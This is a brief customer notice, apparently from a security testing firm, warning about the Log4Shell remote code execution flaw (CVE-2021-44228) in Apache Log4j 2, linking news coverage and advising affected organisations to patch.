The K logix Testing Services team wanted to share that a critical vulnerability has been discovered in Apache Log4j 2, an open source Java package used to enable logging in many popular applications, and it can be exploited to enable remote code execution on countless servers. The Apache Software Foundation (ASF) has identified the vulnerability as CVE-2021-44228 and it has been dubbed Log4Shell. ASF says Log4Shell receives the maximum severity rating, 10, on the Common Vulnerability Scoring System (CVSS) scale. (PCMag)
Here are a few references:
https://github.com/lunasec-io/lunasec/blob/master/docs/blog/2021-12-09-log4j-zero-day.md
https://www.pcmag.com/news/countless-serves-are-vulnerable-to-apache-log4j-zero-day-exploit
https://arstechnica.com/information-technology/2021/12/minecraft-and-other-apps-face-serious-threat-from-new-code-execution-bug/
If you are using in-house or third-party developed Java-based applications that use vulnerable versions of Log4j, you may want to look into patching. Apple iCloud was affected, as are many other service providers. The vulnerability can be triggered by many applications that log untrusted or unsanitized data. Depending on the application, this can likely be unauthenticated portions of applications that simply log web requests, attempted authentication, or any logging activities that use the vulnerable directives that allow the application to attempt to communicate with a malicious LDAP server.
If you have any questions or concerns please don’t hesitate to reach out to us.
